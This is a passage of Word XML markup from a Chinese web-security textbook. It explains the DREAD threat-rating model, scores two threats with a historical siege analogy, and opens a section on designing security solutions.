              <w:spacing w:before="1"/>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>泄露其他信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="558" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1157" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="6"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:sz w:val="14"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="0"/>
              <w:ind w:left="107"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>Reproducibility</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2580" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="0"/>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>攻击者可以随意再次攻击</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rPr>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>攻击者可以重复攻击，但有时间</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="88"/>
              <w:ind w:left="112"/>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>限制</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1850" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>攻击者很难重复攻击</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="88"/>
              <w:ind w:left="112"/>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>过程</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="280" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1157" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="47"/>
              <w:ind w:left="107"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>Exploitability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2580" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>初学者在短期内能掌握攻击方法</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rPr>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>熟练的攻击者才能完成这次攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1850" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="256"/>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>漏洞利用条件非常苛刻</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="280" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1157" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="47"/>
              <w:ind w:left="107"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>Affected users</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2580" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>所有用户，默认配置，关键用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2520" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>部分用户，非默认配置</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1850" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>极少数用户，匿名用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:header="930" w:footer="0" w:top="1380" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:sz w:val="6"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="2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157"/>
        <w:gridCol w:w="2580"/>
        <w:gridCol w:w="2520"/>
        <w:gridCol w:w="1850"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="560" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1157" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="8"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:sz w:val="14"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="1"/>
              <w:ind w:left="107"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>Discoverability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2580" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="11"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="1"/>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>漏洞很显眼，攻击条件很容易获得</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2520" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="36"/>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>在私有区域，部分人能看到，需</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="89"/>
              <w:ind w:left="112"/>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>要深入挖掘漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1850" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="11"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="0"/>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>发现该漏洞极其困难</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="77"/>
        <w:ind w:left="203" w:right="120" w:firstLine="400"/>
      </w:pPr>
      <w:bookmarkStart w:name="1.6.4  设计安全方案" w:id="36"/>
      <w:bookmarkEnd w:id="36"/>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-28"/>
        </w:rPr>
        <w:t>在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>DREAD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>模型里，每一个因素都可以分为高、中、低三个等级。在上表中，高、中、低</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t>三个等级分别以 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-46"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-46"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t>的分数代表其权重值，因此，我们可以具体计算出某一个威胁的风险值。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="155"/>
        <w:ind w:left="203" w:right="223" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>以《智取华山》为例，如果国民党在威胁建模后发现存在两个主要威胁：第一个威胁是从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t>正面入口强攻，第二个威胁是从后山小路爬悬崖上来。那么，这两个威胁对应的风险分别计算如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="156"/>
        <w:ind w:left="603"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>走正面的入口：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="12"/>
        <w:rPr>
          <w:sz w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="8396" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0"/>
        <w:ind w:left="203" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
          <w:shd w:fill="DADADA" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>Risk = D(3) + R(3) + E(3) + A(3) + D(3) =</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-22"/>
          <w:sz w:val="16"/>
          <w:shd w:fill="DADADA" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
          <w:shd w:fill="DADADA" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>3+3+3+3+3=15</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="623"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>走后山小路：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:sz w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="8396" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:left="203" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
          <w:shd w:fill="DADADA" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>Risk = D(3) + R(1) + E(1) + A(3) + D(1) =</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-21"/>
          <w:sz w:val="16"/>
          <w:shd w:fill="DADADA" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
          <w:shd w:fill="DADADA" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>3+1+1+3+1=9</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="623"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>如果我们把风险高低定义如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:shape style="position:absolute;margin-left:12.72pt;margin-top:7.88252pt;width:411.15pt;height:10.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:2752;mso-wrap-distance-left:0;mso-wrap-distance-right:0" type="#_x0000_t202" filled="true" fillcolor="#dadada" stroked="false">
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p>
                  <w:pPr>
                    <w:tabs>
                      <w:tab w:pos="1929" w:val="left" w:leader="none"/>
                      <w:tab w:pos="3736" w:val="left" w:leader="none"/>
                    </w:tabs>
                    <w:spacing w:line="190" w:lineRule="exact" w:before="0"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>高危：</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>12</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>～</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>15</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>分</w:t>
                    <w:tab/>
                    <w:t>中危：</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>8</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>～</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>11</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>分</w:t>
                    <w:tab/>
                    <w:t>低危：</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>0</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>～</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>7</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>分</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <v:fill type="solid"/>
            <w10:wrap type="topAndBottom"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="6"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="307" w:lineRule="auto" w:before="72"/>
        <w:ind w:left="203" w:right="225" w:firstLine="419"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>那么，正面入口是最高危的，必然要派重兵把守；而后山小路竟然是中危的，因此也不能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>忽视。之所以会被这个模型判断为中危的原因，就在于一旦被突破，造成的损失太大，失败不   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>起，所以会相应地提高该风险值。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="161"/>
        <w:ind w:left="203" w:right="223" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>介绍完威胁建模和风险分析的模型后，我们对安全评估的整体过程应该有了一个大致的了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>解。在任何时候都应该记住——模型是死的，人是活的，再好的模型也是需要人来使用的，在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>确定攻击面，以及判断风险高低时，都需要有一定的经验，这也是安全工程师的价值所在。类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-31"/>
        </w:rPr>
        <w:t>似 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>STRIDE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-27"/>
        </w:rPr>
        <w:t>和 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>DREAD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>的模型可能还有很多，不同的标准会对应不同的模型，只要我们觉得这</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>些模型是科学的，能够帮到我们，就可以使用。但模型只能起到一个辅助的作用，最终做出决策的还是人。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1052" w:val="left" w:leader="none"/>
          <w:tab w:pos="1053" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1052" w:right="0" w:hanging="849"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250006" w:id="37"/>
      <w:bookmarkEnd w:id="37"/>
      <w:r>
        <w:rPr>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>设计安全方案</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="307" w:lineRule="auto" w:before="209"/>
        <w:ind w:left="203" w:right="223" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>安全评估的产出物，就是安全解决方案。解决方案一定要有针对性，这种针对性是由资产等级划分、威胁分析、风险分析等阶段的结果给出的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="307" w:lineRule="auto" w:before="160"/>
        <w:ind w:left="203" w:right="223" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>设计解决方案不难，难的是如何设计一个好的解决方案。设计一个好的解决方案，是真正考验安全工程师水平的时候。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="160"/>
        <w:ind w:left="203" w:right="223" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
